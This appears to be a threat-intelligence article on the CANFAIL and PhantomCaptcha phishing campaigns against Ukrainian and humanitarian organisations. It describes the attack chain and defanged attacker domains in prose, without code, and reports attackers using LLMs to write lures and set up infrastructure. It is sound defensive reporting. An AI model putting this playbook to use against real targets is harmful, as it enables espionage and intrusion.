A previously undocumented group leverages LLM-generated phishing lures, multi-stage JavaScript payloads, and WebSocket RATs in a sustained campaign against defense, energy, and humanitarian organizations. Sources: Google Threat Intelligence Group, SentinelOne SentinelLABS, Digital Security Lab of Ukraine.
Introduction
On February 12, 2026, Google Threat Intelligence Group (GTIG) published two companion reports that together paint a sobering picture of the evolving cyber threat landscape facing Ukraine and the global defense industrial base. The first, a quarterly AI threat tracker, detailed how state-backed actors from Russia, China, Iran, and North Korea are increasingly integrating artificial intelligence into every phase of the attack lifecycle. The second focused specifically on the sustained cyber pressure being applied to the defense sector by nation-state actors and criminal groups worldwide.
Buried within these reports was a revelation that immediately caught the attention of the threat intelligence community: the identification of a previously undocumented threat actor, suspected of ties to Russian intelligence services, that has been conducting phishing operations to deliver a malware family called CANFAIL against Ukrainian organizations. What makes this actor especially noteworthy is not raw sophistication—GTIG acknowledged the group is less capable than established Russian APT groups—but rather its deliberate use of large language models to compensate for those limitations and systematically expand its targeting scope.
This article provides a detailed technical breakdown of the CANFAIL campaign, its connection to the previously disclosed PhantomCaptcha operation, the broader context of Russian cyber operations against Ukraine, and what this development means for defenders.
The Threat Actor: Profile and Attribution
GTIG described the newly identified group as suspected to be linked to Russian intelligence services, a phrasing that signals assessed but not fully confirmed attribution. The group has not been assigned a formal APT designation in public reporting, though GTIG tracks it internally under an unattributed cluster designation. It remains distinct from well-known Russian cyber units such as APT28 (Fancy Bear, GRU Unit 26165), APT29 (Cozy Bear, SVR), or APT44 (Sandworm, GRU Unit 74455), all of which operate at significantly higher levels of sophistication and resourcing.
"GTIG has recently discovered a threat group suspected to be linked to Russian intelligence services which conducts phishing operations to deliver CANFAIL malware primarily against Ukrainian organizations." — Google Threat Intelligence Group, Threats to the Defense Industrial Base, February 10, 2026
The group's primary targets include defense, military, government, and energy organizations within Ukrainian regional and national governments. However, GTIG noted that the targeting aperture has been expanding. The actor has shown growing interest in aerospace organizations, manufacturing companies with military and drone ties, nuclear and chemical research organizations, and international organizations involved in conflict monitoring and humanitarian aid in Ukraine.
The geographic scope extends beyond Ukraine as well. GTIG reported that the group has impersonated a Romanian energy company that works with customers in Ukraine, targeted a Romanian firm directly, and conducted reconnaissance against Moldovan organizations. This suggests an intelligence collection mandate that encompasses not just Ukraine itself, but the broader regional ecosystem of nations involved in supporting or interacting with Ukraine's critical infrastructure.
The AI Dimension: LLMs as a Force Multiplier
Perhaps the most significant aspect of this disclosure is the confirmed role of large language models in the threat actor's operations. GTIG stated plainly that despite being less sophisticated and resourced than other Russian threat groups, this actor recently began to overcome some technical limitations using LLMs.
"Despite being less sophisticated and resourced than other Russian threat groups, this actor recently began to overcome some technical limitations using LLMs. Through prompting, they conduct reconnaissance, create lures for social engineering, and seek answers to basic technical questions for post-compromise activity and C2 infrastructure setup." — Google Threat Intelligence Group, Threats to the Defense Industrial Base, February 10, 2026
The ways in which the group uses LLMs span multiple phases of the attack lifecycle. This represents a concrete, real-world case study of how AI tools are lowering the barrier to entry for offensive cyber operations.
This finding was published alongside GTIG's broader AI threat tracker for Q4 2025, which documented how government-backed threat actors from Russia, China, Iran, and North Korea are increasingly integrating AI to achieve productivity gains in reconnaissance, social engineering, and malware development. The tracker also documented UNC6418, a separate unattributed actor that used Gemini to conduct targeted intelligence gathering—seeking out sensitive account credentials and email addresses before launching phishing campaigns focused on Ukraine and the defense sector. While it remains unclear whether the CANFAIL actor specifically used Gemini or other LLM platforms, the operational pattern is consistent. The tracker noted that while no APT group has yet achieved breakthrough capabilities that fundamentally alter the threat landscape through AI, the trend line is clear: AI-augmented operations are becoming standard practice, not an exception.
For the CANFAIL actor specifically, GTIG's analysis concluded that the phishing lures used in campaigns appear to be LLM-generated, characterized by formal language and the mimicry of specific official templates. This is a meaningful operational advantage. Historically, many Russian-linked campaigns targeting Ukrainian organizations produced lures with linguistic imperfections or formatting inconsistencies that served as red flags for trained analysts and alert recipients. AI-generated content can eliminate these telltale signs, producing communications that closely replicate the tone, structure, and vocabulary of legitimate government or corporate correspondence.
Technical Breakdown: The CANFAIL Kill Chain
The CANFAIL attack chain follows a multi-stage process that, while not revolutionary in its individual components, is effective in its execution and designed to evade common detection mechanisms.
Stage 1: Reconnaissance and Target Selection
The threat actor generates email address lists tailored to specific regions and industries based on their research. LLM tooling appears to accelerate this process, enabling the actor to rapidly profile organizations and individuals across multiple sectors without the overhead of dedicated intelligence infrastructure.
Stage 2: Phishing Delivery
Recent campaigns have involved the threat actor impersonating legitimate national and local Ukrainian energy organizations to obtain unauthorized access to organizational and personal email accounts. In other instances, the group has masqueraded as a Romanian energy company that works with customers in Ukraine. The phishing emails contain lures that GTIG assessed as likely LLM-generated, using formal language and specific official templates. These messages embed Google Drive links pointing to a RAR archive containing the CANFAIL payload.
The use of Google Drive links to host malicious RAR archives is a deliberate choice. By routing delivery through a trusted cloud platform, the actor bypasses URL reputation filters that would flag unknown or newly registered domains. Organizations should implement content inspection for files downloaded from cloud storage services, even those from well-known providers, and consider restricting automatic file downloads from external cloud storage links embedded in email.
Stage 3: The CANFAIL Payload
CANFAIL itself is an obfuscated JavaScript malware typically disguised with a double extension—for example, document.pdf.js—to make it appear as a PDF file to the victim. The double-extension technique exploits a default behavior in many Windows environments where known file extensions are hidden, causing the file to display as simply document.pdf in the file explorer.
When executed, CANFAIL performs two simultaneous actions. First, it displays a fake error popup to the victim, creating the impression that the file failed to open properly. This social engineering element is designed to prevent the target from investigating further or becoming suspicious. Second, it executes a PowerShell script that downloads and executes an additional stage, typically a memory-only PowerShell dropper.
The memory-only execution is a critical design choice. By avoiding writing payloads to disk, the malware significantly reduces the likelihood of detection by traditional antivirus solutions and endpoint protection platforms that rely on file-based scanning. The dropper establishes persistence and prepares the environment for the final payload deployment.
"CANFAIL is obfuscated JavaScript which executes a PowerShell script to download and execute an additional stage, most commonly a memory-only PowerShell dropper. It additionally displays a fake 'error' popup to the victim." — Google Threat Intelligence Group
The PhantomCaptcha Connection
GTIG explicitly linked the CANFAIL activity to a campaign called PhantomCaptcha that was previously disclosed by SentinelOne's SentinelLABS and the Digital Security Lab of Ukraine on October 22, 2025. This connection is significant because PhantomCaptcha represented one of the more sophisticated and carefully orchestrated single-day phishing operations documented in recent months.
The PhantomCaptcha campaign, launched on October 8, 2025, targeted individual members of the International Committee of the Red Cross (ICRC), the Norwegian Refugee Council, the United Nations Children's Fund (UNICEF) Ukraine office, the Council of Europe's Register of Damage for Ukraine, and Ukrainian regional government administrations in the Donetsk, Dnipropetrovsk, Poltava, and Mykolaiv regions. The target list pointed to an adversary seeking intelligence across humanitarian operations, reconstruction planning, and international coordination efforts related to Ukraine's war relief.
The PhantomCaptcha attack chain used emails impersonating the Ukrainian President's Office. These contained an eight-page weaponized PDF document—crafted to resemble a legitimate governmental communiqué—with an embedded link that redirected victims to a fake Zoom site hosted at zoomconference[.]app. On that site, victims encountered what appeared to be a Cloudflare DDoS protection verification page—a familiar sight to any regular internet user—featuring a fake "I'm not a robot" checkbox.
This was a variant of the ClickFix (also called Paste and Run) social engineering technique, which has been widely adopted by threat actors since mid-2024. In the PhantomCaptcha variant, the fake CAPTCHA tricked Windows users into copying a "token" and then pressing Windows + R to open the Run dialog before pasting and executing the command—which was actually a PowerShell script designed to compromise their system. SentinelLABS noted that this social engineering technique is particularly effective because the malicious code is executed by the user themselves, evading endpoint security controls that focus solely on detecting malicious files.
The final payload delivered through PhantomCaptcha was a WebSocket-based Remote Access Trojan (RAT) hosted on Russian-owned infrastructure. SentinelLABS described it as enabling arbitrary remote command execution, data exfiltration, and potential deployment of additional malware.
"The final payload is a WebSocket RAT hosted on Russian-owned infrastructure that enables arbitrary remote command execution, data exfiltration, and potential deployment of additional malware." — SentinelOne SentinelLABS, PhantomCaptcha: Multi-Stage WebSocket RAT Targets Ukraine in Single-Day Spearphishing Operation, October 22, 2025
The C2 server was hosted at bsnowcommunications[.]com, which remained active even after the user-facing attack domains were taken offline—a deliberate compartmentalization strategy designed to maintain access to already-compromised systems while protecting core infrastructure from detection.
What made PhantomCaptcha particularly notable from an operational security standpoint was its timing discipline. Infrastructure preparation began as early as March 27, 2025—a full six months before the attack—with the domain goodhillsenterprise[.]com registered to serve obfuscated PowerShell scripts. SSL certificates were issued in September 2025. Yet the user-facing attack domain was active for only a single day. After the campaign, the attackers swiftly dismantled user-facing domains while maintaining backend command-and-control capabilities. SentinelLABS assessed this pattern as indicative of an adversary with extensive operational planning, compartmentalized infrastructure, and deliberate exposure control.
SentinelLABS identified tactical and technical overlaps between PhantomCaptcha and COLDRIVER (also tracked as Star Blizzard or UNC4057), a threat cluster attributed to Russia's Federal Security Service (FSB). These overlaps include the ClickFix lure technique and the use of Russian-hosted C2 infrastructure. Attribution was not confirmed at the time of SentinelLABS' October 2025 publication. When GTIG later linked PhantomCaptcha to the CANFAIL actor in February 2026, it maintained the characterization of the group as "suspected" Russian intelligence—stopping short of a specific agency or unit attribution. Defenders should treat this connection as a working hypothesis subject to revision as additional technical evidence emerges.
SentinelLABS' infrastructure analysis also uncovered a secondary operation linked to the PhantomCaptcha campaign: fake Android applications hosted on the domain princess-mens[.]click, designed to harvest contacts, call logs, media files, geolocation data, and device information from compromised mobile devices. This suggests a multi-platform intelligence collection capability that extends beyond traditional desktop-based phishing, and indicates an adversary with both the intent and capacity to conduct parallel mobile surveillance operations.
Broader Russian Cyber Operations Against Ukraine
The CANFAIL actor does not operate in isolation. GTIG's defense industrial base report documented a constellation of Russian-nexus threat groups actively targeting Ukrainian military, defense, and critical infrastructure organizations, each with distinct capabilities and operational mandates.
APT44 (also known as Sandworm or FROZENBARENTS), linked to GRU Unit 74455, remains the most consequential Russian cyber actor in the conflict. The group has sought to extract data from Signal and Telegram, using tools like WAVESIGN and INFAMOUSCHISEL to steal information from Windows and Android devices—including from mobile devices captured on the battlefield during Russia's ongoing invasion of Ukraine.
GTIG also identified TEMP.Vermin, tied to actors linked to the Luhansk People's Republic (LPR), which deployed malware families such as VERMONSTER and SPECTRUM using aerospace and drone-themed domains. UNC5125 targeted frontline drone units with Google Forms-based lures and malware including MESSYFORK and GREYBATTLE. Meanwhile, UNC5792 and UNC4221 abused features in Signal and WhatsApp—using fake group invites and phishing pages—to hijack accounts and deploy malware such as STALECOOKIE and TINYWHALE.
"Russia's use of cyber operations in support of military objectives in the war against Ukraine and beyond is multifaceted. On a tactical level, targeting has broadened to include individuals in addition to organizations in order to support frontline operations and beyond, likely due at least in part to the reliance on public and off-the-shelf technology rather than custom products." — Google Threat Intelligence Group, Threats to the Defense Industrial Base, February 10, 2026
Consistent with that assessment, Russian threat actors have targeted secure messaging applications used by the Ukrainian military to communicate and orchestrate military operations, including via attempts to exfiltrate locally stored databases of these apps from mobile devices captured during Russia's ongoing invasion of Ukraine.
GTIG has also identified attempts to compromise users of battlefield management systems such as Delta and Kropyva, underscoring the critical role these platforms play in coordinating Ukrainian military operations and the corresponding value they represent as intelligence targets.
Implications for Defenders
The CANFAIL campaign and its broader context carry several important takeaways for security teams, regardless of whether their organizations are directly within the threat actor's current targeting scope.
AI-augmented phishing demands updated training. Traditional security awareness programs that teach employees to look for grammatical errors, awkward phrasing, or formatting inconsistencies in phishing emails are increasingly insufficient. When threat actors use LLMs to generate lures, those linguistic red flags largely disappear. Organizations should update training to emphasize verification of sender identity, suspicion of unexpected attachments or links regardless of language quality, and institutional procedures for confirming unusual requests through out-of-band communication channels.
The double-extension trick remains effective. Despite being a well-documented technique, the use of .pdf.js double extensions continues to succeed because many Windows environments hide known file extensions by default. Organizations should enforce group policies that display full file extensions and implement email gateway rules that flag or block executable file types within archives.
Memory-only payloads require behavioral detection. CANFAIL's use of memory-only PowerShell droppers underscores the limitations of signature-based antivirus. Endpoint detection and response (EDR) solutions with behavioral monitoring capabilities—particularly those that flag suspicious PowerShell execution patterns, encoded command lines, and in-memory injection techniques—are essential for detecting this class of threat.
ClickFix is a growing social engineering vector. The ClickFix technique documented in the PhantomCaptcha campaign represents a particularly insidious form of social engineering because it causes victims to execute malicious code themselves, effectively bypassing endpoint security controls that monitor for malicious file execution. Defenders should implement application control policies that restrict unauthorized PowerShell execution and monitor for clipboard-based command execution patterns. End-user training should specifically address instructions that prompt users to paste commands into Windows Run dialogs or terminal windows.
Google Drive and legitimate cloud services as delivery mechanisms. The use of Google Drive links to host malicious RAR archives demonstrates how threat actors leverage trusted cloud platforms to bypass URL reputation filtering. Organizations should implement content inspection for files downloaded from cloud storage services, even those from well-known providers, and consider policies that restrict automatic file downloads from external cloud storage links in email.
Mobile devices are part of the attack surface. The Android spyware component associated with PhantomCaptcha is a reminder that threat actors in this cluster are not limiting themselves to Windows endpoints. Organizations operating in or adjacent to the conflict zone should include mobile device management policies in their threat response posture, particularly for personnel who may be targeted individually rather than through organizational infrastructure.
What This Tells Us About Where Things Are Heading
The CANFAIL actor represents an archetype that is likely to become more common in the threat landscape: a lower-tier, less-resourced group that uses commercially available AI tools to compensate for skill gaps and scale operations beyond what would otherwise be possible with its organic capabilities. GTIG's assessment that the group has begun to overcome technical limitations through LLM use should be read as a leading indicator, not an isolated case.
The convergence of AI-augmented reconnaissance, professionally crafted phishing lures, multi-stage in-memory malware, and the exploitation of trusted cloud platforms creates a compound threat that is more challenging to detect and defend against than any single one of those elements alone. When combined with the operational discipline demonstrated in the PhantomCaptcha campaign—six months of infrastructure preparation for a single-day operation, compartmentalized domain management, and swift teardown of attack infrastructure—the picture that emerges is of an adversary that, while not yet in the top tier of Russian cyber capability, is learning and adapting rapidly.
For organizations operating in Ukraine, the broader Eastern European region, or in sectors that intersect with the conflict—defense, energy, humanitarian aid, aerospace, and manufacturing—the CANFAIL campaign is a reminder that the threat landscape is not static. New actors continue to emerge, existing techniques are being refined through AI augmentation, and the targeting aperture continues to widen.
The clarity to understand what's happening and what to do about it starts with visibility into threats like this one.